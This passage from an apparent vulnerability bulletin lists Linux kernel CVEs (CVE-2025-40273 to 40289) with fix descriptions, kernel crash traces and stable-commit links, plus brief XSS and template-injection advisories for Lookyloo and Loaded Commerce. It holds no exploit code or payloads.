kworker/u24:33 Kdump: loaded Tainted: G B W 6.17.0-rc7+ #22 PREEMPT(voluntary) [ 1626.857075] Tainted: [B]=BAD_PAGE, [W]=WARN [ 1626.857573] Hardware name: VMware, Inc. VMware20,1/VBSA, BIOS VMW201.00V.24006586.BA64.2406042154 06/04/2024 [ 1626.858724] Workqueue: nfsd4 laundromat_main [nfsd] [ 1626.859304] pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 1626.860010] pc : __list_del_entry_valid_or_report+0x148/0x200 [ 1626.860601] lr : __list_del_entry_valid_or_report+0x148/0x200 [ 1626.861182] sp : ffff8000881d7a40 [ 1626.861521] x29: ffff8000881d7a40 x28: 0000000000000018 x27: ffff0000c2a98200 [ 1626.862260] x26: 0000000000000600 x25: 0000000000000000 x24: ffff8000881d7b20 [ 1626.862986] x23: ffff0000c2a981e8 x22: 1fffe00012410e7d x21: ffff0000920873e8 [ 1626.863701] x20: ffff0000920873e8 x19: ffff000086f22998 x18: 0000000000000000 [ 1626.864421] x17: 20747562202c3839 x16: 3932326636383030 x15: 3030666666662065 [ 1626.865092] x14: 6220646c756f6873 x13: 0000000000000001 x12: ffff60004fd9e4a3 [ 1626.865713] x11: 1fffe0004fd9e4a2 x10: ffff60004fd9e4a2 x9 : dfff800000000000 [ 1626.866320] x8 : 00009fffb0261b5e x7 : ffff00027ecf2513 x6 : 0000000000000001 [ 1626.866938] x5 : ffff00027ecf2510 x4 : ffff60004fd9e4a3 x3 : 0000000000000000 [ 1626.867553] x2 : 0000000000000000 x1 : ffff000096069640 x0 : 000000000000006d [ 1626.868167] Call trace: [ 1626.868382] __list_del_entry_valid_or_report+0x148/0x200 (P) [ 1626.868876] _free_cpntf_state_locked+0xd0/0x268 [nfsd] [ 1626.869368] nfs4_laundromat+0x6f8/0x1058 [nfsd] [ 1626.869813] laundromat_main+0x24/0x60 [nfsd] [ 1626.870231] process_one_work+0x584/0x1050 [ 1626.870595] worker_thread+0x4c4/0xc60 [ 1626.870893] kthread+0x2f8/0x398 [ 1626.871146] ret_from_fork+0x10/0x20 [ 1626.871422] Code: aa1303e1 aa1403e3 910e8000 97bc55d7 (d4210000) [ 1626.871892] SMP: stopping secondary CPUs | 2025-12-06 | not yet calculated | CVE-2025-40273 | https://git.kernel.org/stable/c/935a2dc8928670bb2c37e21025331e61ec48ccf4 https://git.kernel.org/stable/c/b114996a095da39e38410a0328d4a8aca8c36088 https://git.kernel.org/stable/c/839f56f626723f36904764858467e7a3881b975d https://git.kernel.org/stable/c/29fbb3ad4018ca2b0988fbac76f4c694cc6d7e66 https://git.kernel.org/stable/c/d7be15a634aa3874827d0d3ea47452ee878b8df7 https://git.kernel.org/stable/c/f67ad9b33b0e6f00d2acc67cbf9cfa5c756be5fb https://git.kernel.org/stable/c/4aa17144d5abc3c756883e3a010246f0dba8b468 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying When unbinding a memslot from a guest_memfd instance, remove the bindings even if the guest_memfd file is dying, i.e. even if its file refcount has gone to zero. If the memslot is freed before the file is fully released, nullifying the memslot side of the binding in kvm_gmem_release() will write to freed memory, as detected by syzbot+KASAN: ================================================================== BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353 Write of size 8 at addr ffff88807befa508 by task syz.0.17/6022 CPU: 0 UID: 0 PID: 6022 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Call Trace: <TASK> dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353 __fput+0x44c/0xa70 fs/file_table.c:468 task_work_run+0x1d4/0x260 kernel/task_work.c:227 resume_user_mode_work include/linux/resume_user_mode.h:50 [inline] exit_to_user_mode_loop+0xe9/0x130 kernel/entry/common.c:43 exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline] syscall_exit_to_user_mode_work include/linux/entry-common.h:175 [inline] syscall_exit_to_user_mode include/linux/entry-common.h:210 [inline] do_syscall_64+0x2bd/0xfa0 arch/x86/entry/syscall_64.c:100 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fbeeff8efc9 </TASK> Allocated by task 6023: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:397 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:414 kasan_kmalloc include/linux/kasan.h:262 [inline] __kmalloc_cache_noprof+0x3e2/0x700 mm/slub.c:5758 kmalloc_noprof include/linux/slab.h:957 [inline] kzalloc_noprof include/linux/slab.h:1094 [inline] kvm_set_memory_region+0x747/0xb90 virt/kvm/kvm_main.c:2104 kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154 kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 6023: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:584 poison_slab_object mm/kasan/common.c:252 [inline] __kasan_slab_free+0x5c/0x80 mm/kasan/common.c:284 kasan_slab_free include/linux/kasan.h:234 [inline] slab_free_hook mm/slub.c:2533 [inline] slab_free mm/slub.c:6622 [inline] kfree+0x19a/0x6d0 mm/slub.c:6829 kvm_set_memory_region+0x9c4/0xb90 virt/kvm/kvm_main.c:2130 kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154 kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Deliberately don't acquire filemap invalid lock when the file is dying as the lifecycle of f_mapping is outside the purview of KVM. Dereferencing the mapping is *probably* fine, but there's no need to invalidate anything as memslot deletion is responsible for zapping SPTEs, and the only code that can access the dying file is kvm_gmem_release(), whose core code is mutual ---truncated--- | 2025-12-06 | not yet calculated | CVE-2025-40274 | https://git.kernel.org/stable/c/a8ac2bd0f98e1a230f1eb3260fa552bf2ef1753b https://git.kernel.org/stable/c/393893693a523e053f84d69320d090b93503f79f https://git.kernel.org/stable/c/ae431059e75d36170a5ae6b44cc4d06d43613215 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Fix NULL pointer dereference in snd_usb_mixer_controls_badd In snd_usb_create_streams(), for UAC version 3 devices, the Interface Association Descriptor (IAD) is retrieved via usb_ifnum_to_if(). If this call fails, a fallback routine attempts to obtain the IAD from the next interface and sets a BADD profile. However, snd_usb_mixer_controls_badd() assumes that the IAD retrieved from usb_ifnum_to_if() is always valid, without performing a NULL check. This can lead to a NULL pointer dereference when usb_ifnum_to_if() fails to find the interface descriptor. This patch adds a NULL pointer check after calling usb_ifnum_to_if() in snd_usb_mixer_controls_badd() to prevent the dereference. This issue was discovered by syzkaller, which triggered the bug by sending a crafted USB device descriptor. | 2025-12-06 | not yet calculated | CVE-2025-40275 | https://git.kernel.org/stable/c/23aea9c74aeea2625aaf4fbcc6beb9d09e30f9e4 https://git.kernel.org/stable/c/c5c08965ab96b16361e69a1e2a0e89dbcb99b5a6 https://git.kernel.org/stable/c/9f282104627be5fbded3102ff9004f753c55a063 https://git.kernel.org/stable/c/2762d3ea9c929ca4094541ca517c317ffa94625b https://git.kernel.org/stable/c/57f607c112966c21240c424b33e2cb71e121dcf0 https://git.kernel.org/stable/c/cbdbfc756f2990942138ed0138da9303b4dbf9ff https://git.kernel.org/stable/c/85568535893600024d7d8794f4f8b6428b521e0c https://git.kernel.org/stable/c/632108ec072ad64c8c83db6e16a7efee29ebfb74 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Flush shmem writes before mapping buffers CPU-uncached The shmem layer zeroes out the new pages using cached mappings, and if we don't CPU-flush we might leave dirty cachelines behind, leading to potential data leaks and/or asynchronous buffer corruption when dirty cachelines are evicted. | 2025-12-06 | not yet calculated | CVE-2025-40276 | https://git.kernel.org/stable/c/7a12f9c96d06b145562f76ffb20369b4692f0911 https://git.kernel.org/stable/c/576c930e5e7dcb937648490611a83f1bf0171048 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: Validate command header size against SVGA_CMD_MAX_DATASIZE This data originates from userspace and is used in buffer offset calculations which could potentially overflow causing an out-of-bounds access. | 2025-12-06 | not yet calculated | CVE-2025-40277 | https://git.kernel.org/stable/c/e58559845021c3bad5e094219378b869157fad53 https://git.kernel.org/stable/c/54d458b244893e47bda52ec3943fdfbc8d7d068b https://git.kernel.org/stable/c/709e5c088f9c99a5cf2c1d1c6ce58f2cca7ab173 https://git.kernel.org/stable/c/a3abb54c27b2c393c44362399777ad2f6e1ff17e https://git.kernel.org/stable/c/b5df9e06eed3df6a4f5c6f8453013b0cabb927b4 https://git.kernel.org/stable/c/5aea2cde03d4247cdcf53f9ab7d0747c9dca1cfc https://git.kernel.org/stable/c/f3f3a8eb3f0ba799fae057091d8c67cca12d6fa0 https://git.kernel.org/stable/c/32b415a9dc2c212e809b7ebc2b14bc3fbda2b9af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak Fix a KMSAN kernel-infoleak detected by syzbot: [net?] KMSAN: kernel-infoleak in __skb_datagram_iter In tcf_ife_dump(), the variable 'opt' was partially initialized using a designated initializer, while the padding bytes remained uninitialized. nla_put() copies the entire structure into a netlink message, so these uninitialized bytes leaked to userspace. Initialize the structure with memset before assigning its fields to ensure all members and padding are cleared prior to being copied. This change silences the KMSAN report and prevents potential information leaks from kernel memory. This fix has been tested and validated by syzbot. This patch closes the bug reported at the following syzkaller link and ensures no infoleak. | 2025-12-06 | not yet calculated | CVE-2025-40278 | https://git.kernel.org/stable/c/918e063304f945fb93be9bb70cacea07d0b730ea https://git.kernel.org/stable/c/5e3644ef147bf7140259dfa4cace680c9b26fe8b https://git.kernel.org/stable/c/37f0680887c5aeba9a433fe04b35169010568bb1 https://git.kernel.org/stable/c/2191662058443e0bcc28d11694293d8339af6dde https://git.kernel.org/stable/c/a676a296af65d33725bdf7396803180957dbd92e https://git.kernel.org/stable/c/d1dbbbe839647486c9b893e5011fe84a052962df https://git.kernel.org/stable/c/c8f51dad94cbb88054e2aacc272b3ce1ed11fb1e https://git.kernel.org/stable/c/ce50039be49eea9b4cd8873ca6eccded1b4a130a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: sched: act_connmark: initialize struct tc_ife to fix kernel leak In tcf_connmark_dump(), the variable 'opt' was partially initialized using a designated initializer, while the padding bytes remained uninitialized. nla_put() copies the entire structure into a netlink message, so these uninitialized bytes leaked to userspace. Initialize the structure with memset before assigning its fields to ensure all members and padding are cleared prior to being copied. | 2025-12-06 | not yet calculated | CVE-2025-40279 | https://git.kernel.org/stable/c/218b67c8c8246d47a2a7910eae80abe4861fe2b7 https://git.kernel.org/stable/c/73cc56c608c209d3d666cc571293b090a471da70 https://git.kernel.org/stable/c/31e4aa93e2e5b5647fc235b0f6ee329646878f9e https://git.kernel.org/stable/c/51cb05d4fd632596816ba44e882e84db9fb28a7e https://git.kernel.org/stable/c/25837889ec062f2b7618142cd80253dff3da5343 https://git.kernel.org/stable/c/62b656e43eaeae445a39cd8021a4f47065af4389 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tipc: Fix use-after-free in tipc_mon_reinit_self(). syzbot reported use-after-free of tipc_net(net)->monitors[] in tipc_mon_reinit_self(). [0] The array is protected by RTNL, but tipc_mon_reinit_self() iterates over it without RTNL. tipc_mon_reinit_self() is called from tipc_net_finalize(), which is always under RTNL except for tipc_net_finalize_work(). Let's hold RTNL in tipc_net_finalize_work(). [0]: BUG: KASAN: slab-use-after-free in __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] BUG: KASAN: slab-use-after-free in _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 Read of size 1 at addr ffff88805eae1030 by task kworker/0:7/5989 CPU: 0 UID: 0 PID: 5989 Comm: kworker/0:7 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025 Workqueue: events tipc_net_finalize_work Call Trace: <TASK> dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __kasan_check_byte+0x2a/0x40 mm/kasan/common.c:568 kasan_check_byte include/linux/kasan.h:399 [inline] lock_acquire+0x8d/0x360 kernel/locking/lockdep.c:5842 __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 rtlock_slowlock kernel/locking/rtmutex.c:1894 [inline] rwbase_rtmutex_lock_state kernel/locking/spinlock_rt.c:160 [inline] rwbase_write_lock+0xd3/0x7e0 kernel/locking/rwbase_rt.c:244 rt_write_lock+0x76/0x110 kernel/locking/spinlock_rt.c:243 write_lock_bh include/linux/rwlock_rt.h:99 [inline] tipc_mon_reinit_self+0x79/0x430 net/tipc/monitor.c:718 tipc_net_finalize+0x115/0x190 net/tipc/net.c:140 process_one_work kernel/workqueue.c:3236 [inline] process_scheduled_works+0xade/0x17b0 kernel/workqueue.c:3319 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3400 kthread+0x70e/0x8a0 kernel/kthread.c:463 ret_from_fork+0x439/0x7d0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> Allocated by task 6089: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:388 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:405 kasan_kmalloc include/linux/kasan.h:260 [inline] __kmalloc_cache_noprof+0x1a8/0x320 mm/slub.c:4407 kmalloc_noprof include/linux/slab.h:905 [inline] kzalloc_noprof include/linux/slab.h:1039 [inline] tipc_mon_create+0xc3/0x4d0 net/tipc/monitor.c:657 tipc_enable_bearer net/tipc/bearer.c:357 [inline] __tipc_nl_bearer_enable+0xe16/0x13f0 net/tipc/bearer.c:1047 __tipc_nl_compat_doit net/tipc/netlink_compat.c:371 [inline] tipc_nl_compat_doit+0x3bc/0x5f0 net/tipc/netlink_compat.c:393 tipc_nl_compat_handle net/tipc/netlink_compat.c:-1 [inline] tipc_nl_compat_recv+0x83c/0xbe0 net/tipc/netlink_compat.c:1321 genl_family_rcv_msg_doit+0x215/0x300 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x60e/0x790 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2552 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0x846/0xa10 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg+0x21c/0x270 net/socket.c:729 ____sys_sendmsg+0x508/0x820 net/socket.c:2614 ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668 __sys_sendmsg net/socket.c:2700 [inline] __do_sys_sendmsg net/socket.c:2705 [inline] __se_sys_sendmsg net/socket.c:2703 [inline] __x64_sys_sendmsg+0x1a1/0x260 net/socket.c:2703 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/ ---truncated--- | 2025-12-06 | not yet calculated | CVE-2025-40280 | https://git.kernel.org/stable/c/5f541300b02ef8b2af34f6f7d41ce617f3571e88 https://git.kernel.org/stable/c/b2e77c789c234e7fe49057d2ced8f32e2d2c7901 https://git.kernel.org/stable/c/51b8f0ab888f8aa5dfac954918864eeda8c12c19 https://git.kernel.org/stable/c/499b5fa78d525c4450ebb76db83207db71efea77 https://git.kernel.org/stable/c/c92dbf85627b5c29e52d9c120a24e785801716df https://git.kernel.org/stable/c/f0104977fed25ebe001fd63dab2b6b7fefad3373 https://git.kernel.org/stable/c/fdf7c4c9af4f246323ce854e84b6aec198d49f7e https://git.kernel.org/stable/c/0725e6afb55128be21a2ca36e9674f573ccec173 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sctp: prevent possible shift-out-of-bounds in sctp_transport_update_rto syzbot reported a possible shift-out-of-bounds [1] Blamed commit added rto_alpha_max and rto_beta_max set to 1000. It is unclear if some sctp users are setting very large rto_alpha and/or rto_beta. In order to prevent user regression, perform the test at run time. Also add READ_ONCE() annotations as sysctl values can change under us. [1] UBSAN: shift-out-of-bounds in net/sctp/transport.c:509:41 shift exponent 64 is too large for 32-bit type 'unsigned int' CPU: 0 UID: 0 PID: 16704 Comm: syz.2.2320 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x16c/0x1f0 lib/dump_stack.c:120 ubsan_epilogue lib/ubsan.c:233 [inline] __ubsan_handle_shift_out_of_bounds+0x27f/0x420 lib/ubsan.c:494 sctp_transport_update_rto.cold+0x1c/0x34b net/sctp/transport.c:509 sctp_check_transmitted+0x11c4/0x1c30 net/sctp/outqueue.c:1502 sctp_outq_sack+0x4ef/0x1b20 net/sctp/outqueue.c:1338 sctp_cmd_process_sack net/sctp/sm_sideeffect.c:840 [inline] sctp_cmd_interpreter net/sctp/sm_sideeffect.c:1372 [inline] | 2025-12-06 | not yet calculated | CVE-2025-40281 | https://git.kernel.org/stable/c/0e0413e3315199b23ff4aec295e256034cd0a6e4 https://git.kernel.org/stable/c/834e65be429c0fa4f9bb5945064bd57f18ed2187 https://git.kernel.org/stable/c/abb086b9a95d0ed3b757ee59964ba3c4e4b2fc1a https://git.kernel.org/stable/c/d0d858652834dcf531342c82a0428170aa7c2675 https://git.kernel.org/stable/c/ed71f801249d2350c77a73dca2c03918a15a62fe https://git.kernel.org/stable/c/1cfa4eac275cc4875755c1303d48a4ddfe507ca8 https://git.kernel.org/stable/c/aaba523dd7b6106526c24b1fd9b5fc35e5aaa88d https://git.kernel.org/stable/c/1534ff77757e44bcc4b98d0196bc5c0052fce5fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: 6lowpan: reset link-local header on ipv6 recv path Bluetooth 6lowpan.c netdev has header_ops, so it must set link-local header for RX skb, otherwise things crash, eg. with AF_PACKET SOCK_RAW Add missing skb_reset_mac_header() for uncompressed ipv6 RX path. For the compressed one, it is done in lowpan_header_decompress(). Log: (BlueZ 6lowpan-tester Client Recv Raw - Success) ------ kernel BUG at net/core/skbuff.c:212! Call Trace: <IRQ> ... packet_rcv (net/packet/af_packet.c:2152) ... <TASK> __local_bh_enable_ip (kernel/softirq.c:407) netif_rx (net/core/dev.c:5648) chan_recv_cb (net/bluetooth/6lowpan.c:294 net/bluetooth/6lowpan.c:359) ------ | 2025-12-06 | not yet calculated | CVE-2025-40282 | https://git.kernel.org/stable/c/ea46a1d217bc82e01cf3d0424e50ebfe251e34bf https://git.kernel.org/stable/c/973e0271754c77db3e1b6b69adf2de85a79a4c8b https://git.kernel.org/stable/c/d566e9a2bfc848941b091ffd5f4e12c4e889d818 https://git.kernel.org/stable/c/4ebb90c3c309e6375dc3e841af92e2a039843e62 https://git.kernel.org/stable/c/c24ac6cfe4f9a47180a65592c47e7a310d2f9d93 https://git.kernel.org/stable/c/11cd7e068381666f842ad41d1cc58eecd0c75237 https://git.kernel.org/stable/c/70d84e7c3a44b81020a3c3d650a64c63593405bd https://git.kernel.org/stable/c/3b78f50918276ab28fb22eac9aa49401ac436a3b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: reorder cleanup in btusb_disconnect to avoid UAF There is a KASAN: slab-use-after-free read in btusb_disconnect(). Calling "usb_driver_release_interface(&btusb_driver, data->intf)" will free the btusb data associated with the interface. The same data is then used later in the function, hence the UAF. Fix by moving the accesses to btusb data to before the data is free'd. | 2025-12-06 | not yet calculated | CVE-2025-40283 | https://git.kernel.org/stable/c/297dbf87989e09af98f81f2bcb938041785557e8 https://git.kernel.org/stable/c/f858f004bc343a7ae9f2533bbb2a3ab27428532f https://git.kernel.org/stable/c/7a6d1e740220ff9dfcb6a8c994d6ba49e76db198 https://git.kernel.org/stable/c/5dc00065a0496c36694afe11e52a5bc64524a9b8 https://git.kernel.org/stable/c/1c28c1e1522c773a94e26950ffb145e88cd9834b https://git.kernel.org/stable/c/95b9b98c93b1c0916a3d4cf4540b7f5d69145a0d https://git.kernel.org/stable/c/a2610ecd9fd5708be8997ca8f033e4200c0bb6af https://git.kernel.org/stable/c/23d22f2f71768034d6ef86168213843fc49bf550 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: cancel mesh send timer when hdev removed mesh_send_done timer is not canceled when hdev is removed, which causes crash if the timer triggers after hdev is gone. Cancel the timer when MGMT removes the hdev, like other MGMT timers. Should fix the BUG: sporadically seen by BlueZ test bot (in "Mesh - Send cancel - 1" test). Log: ------ BUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0 ... Freed by task 36: kasan_save_stack+0x24/0x50 kasan_save_track+0x14/0x30 __kasan_save_free_info+0x3a/0x60 __kasan_slab_free+0x43/0x70 kfree+0x103/0x500 device_release+0x9a/0x210 kobject_put+0x100/0x1e0 vhci_release+0x18b/0x240 ------ | 2025-12-06 | not yet calculated | CVE-2025-40284 | https://git.kernel.org/stable/c/990e6143b0ca0c66f099d67d00c112bf59b30d76 https://git.kernel.org/stable/c/2927ff643607eddf4f03d10ef80fe10d977154aa https://git.kernel.org/stable/c/7b6b6c077cad0601d62c3c34ab7ce3fb25deda7b https://git.kernel.org/stable/c/fd62ca5ad136dcf6f5aa308423b299a6be6f54ea https://git.kernel.org/stable/c/55fb52ffdd62850d667ebed842815e072d3c9961 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb/server: fix possible refcount leak in smb2_sess_setup() Reference count of ksmbd_session will leak when session need reconnect. Fix this by adding the missing ksmbd_user_session_put(). | 2025-12-06 | not yet calculated | CVE-2025-40285 | https://git.kernel.org/stable/c/6fc935f798d44a8eb8a5e6659198399fbf57b981 https://git.kernel.org/stable/c/e671f9bb97805771380c98de944e2ceab6949188 https://git.kernel.org/stable/c/dcc51dfe6ff26b52cac106865a172ac982d78401 https://git.kernel.org/stable/c/d37b2c81c83d6c0d5ca582f4fe73c672983f9e0d https://git.kernel.org/stable/c/379510a815cb2e64eb0a379cb62295d6ade65df0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb/server: fix possible memory leak in smb2_read() Memory leak occurs when ksmbd_vfs_read() fails. Fix this by adding the missing kvfree(). | 2025-12-06 | not yet calculated | CVE-2025-40286 | https://git.kernel.org/stable/c/0797c6cf3b857cc229ab2bc69552938dcd738d78 https://git.kernel.org/stable/c/63d8706a2c09a0c29b8b0e8a44bc7a1339685de9 https://git.kernel.org/stable/c/f1305587731886da37a214cda812ade246c653b0 https://git.kernel.org/stable/c/bfda5422a16651d0bf864ec468b1c216e1b10d91 https://git.kernel.org/stable/c/6fced056d2cc8d01b326e6fcfabaacb9850b71a4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: fix improper check of dentry.stream.valid_size We found an infinite loop bug in the exFAT file system that can lead to a Denial-of-Service (DoS) condition. When a dentry in an exFAT filesystem is malformed, the following system calls - SYS_openat, SYS_ftruncate, and SYS_pwrite64 - can cause the kernel to hang. Root cause analysis shows that the size validation code in exfat_find() does not check whether dentry.stream.valid_size is negative. As a result, the system calls mentioned above can succeed and eventually trigger the DoS issue. This patch adds a check for negative dentry.stream.valid_size to prevent this vulnerability. | 2025-12-06 | not yet calculated | CVE-2025-40287 | https://git.kernel.org/stable/c/6c627bcc1896ba62ec793d0c00da74f3c93ce3ad https://git.kernel.org/stable/c/204b1b02ee018ba52ad2ece21fe3a8643d66a1b2 https://git.kernel.org/stable/c/82ebecdc74ff555daf70b811d854b1f32a296bea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix NULL pointer dereference in VRAM logic for APU devices Previously, APU platforms (and other scenarios with uninitialized VRAM managers) triggered a NULL pointer dereference in `ttm_resource_manager_usage()`. The root cause is not that the `struct ttm_resource_manager *man` pointer itself is NULL, but that `man->bdev` (the backing device pointer within the manager) remains uninitialized (NULL) on APUs, since APUs lack dedicated VRAM and do not fully set up VRAM manager structures. When `ttm_resource_manager_usage()` attempts to acquire `man->bdev->lru_lock`, it dereferences the NULL `man->bdev`, leading to a kernel OOPS. 1. **amdgpu_cs.c**: Extend the existing bandwidth control check in `amdgpu_cs_get_threshold_for_moves()` to include a check for `ttm_resource_manager_used()`. If the manager is not used (uninitialized `bdev`), return 0 for migration thresholds immediately, skipping VRAM-specific logic that would trigger the NULL dereference. 2. **amdgpu_kms.c**: Update the `AMDGPU_INFO_VRAM_USAGE` ioctl and memory info reporting to use a conditional: if the manager is used, return the real VRAM usage; otherwise, return 0. This avoids accessing `man->bdev` when it is NULL. 3. **amdgpu_virt.c**: Modify the vf2pf (virtual function to physical function) data write path. Use `ttm_resource_manager_used()` to check validity: if the manager is usable, calculate `fb_usage` from VRAM usage; otherwise, set `fb_usage` to 0 (APUs have no discrete framebuffer to report). This approach is more robust than APU-specific checks because it: - Works for all scenarios where the VRAM manager is uninitialized (not just APUs), - Aligns with TTM's design by using its native helper function, - Preserves correct behavior for discrete GPUs (which have fully initialized `man->bdev` and pass the `ttm_resource_manager_used()` check). v4: use ttm_resource_manager_used(&adev->mman.vram_mgr.manager) instead of checking the adev->gmc.is_app_apu flag (Christian) | 2025-12-06 | not yet calculated | CVE-2025-40288 | https://git.kernel.org/stable/c/e70113b741ba253886cd71dbadfe3ea444bb2f5c https://git.kernel.org/stable/c/1243e396148a65bb6c42a2b70fe43e50c16c494f https://git.kernel.org/stable/c/43aa61c18a3a45042b098b7a1186ffb29364002c https://git.kernel.org/stable/c/070bdce18fb12a49eb9c421e57df17d2ad29bf5f https://git.kernel.org/stable/c/883f309add55060233bf11c1ea6947140372920f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM Otherwise accessing them can cause a crash. | 2025-12-06 | not yet calculated | CVE-2025-40289 | https://git.kernel.org/stable/c/39a1c8c860e32d775f29917939e87b6a7c08ebb1 https://git.kernel.org/stable/c/a67a9f99ce1306898d7129a199d42876bc06a0f0 https://git.kernel.org/stable/c/33cc891b56b93cad1a83263eaf2e417436f70c82 |
| loadedcommerce--Loaded Commerce | Loaded Commerce 6.6 contains a client-side template injection vulnerability that allows unauthenticated attackers to execute code on the server via the search parameter. | 2025-12-04 | not yet calculated | CVE-2025-66572 | ExploitDB-52084 Loaded Commerce Homepage https://www.vulncheck.com/advisories/loaded-commerce-66-client-side-template-injectioncsti |
| Lookyloo--lookyloo | Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to 1.35.3, there are multiple XSS due to unsafe use of f-strings in Markup. The issue requires a malicious 3rd party server responding with a JSON document containing JS code in a script element. This vulnerability is fixed in 1.35.3. | 2025-12-02 | not yet calculated | CVE-2025-66458 | https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-58h2-652v-gq87 https://github.com/Lookyloo/lookyloo/commit/b6ee2fee0afff0b35f37dd891bbce9d53ed8a290 |
| Lookyloo--lookyloo | Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to 1.35.3, an XSS vulnerability can be triggered when a user submits a list of URLs to capture, one of them contains an HTML element, and the capture fails. The error field is then populated with an error message that contains the bad URL they tried to capture, triggering the XSS. This vulnerability is fixed in 1.35.3. | 2025-12-02 | not yet calculated | CVE-2025-66459 | https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-hvmh-j2jx-48wg https://github.com/Lookyloo/lookyloo/commit/1850a34b8cec52438df3b544295b20cfa35f8ad1 https://github.com/Lookyloo/lookyloo/commit/8c3ab96de44c1ce15646d734aa06faf884329116 https://github.com/Lookyloo/lookyloo/commit/95cdc00fe37fd89790fa89bb3ee3fefa2da38442 |
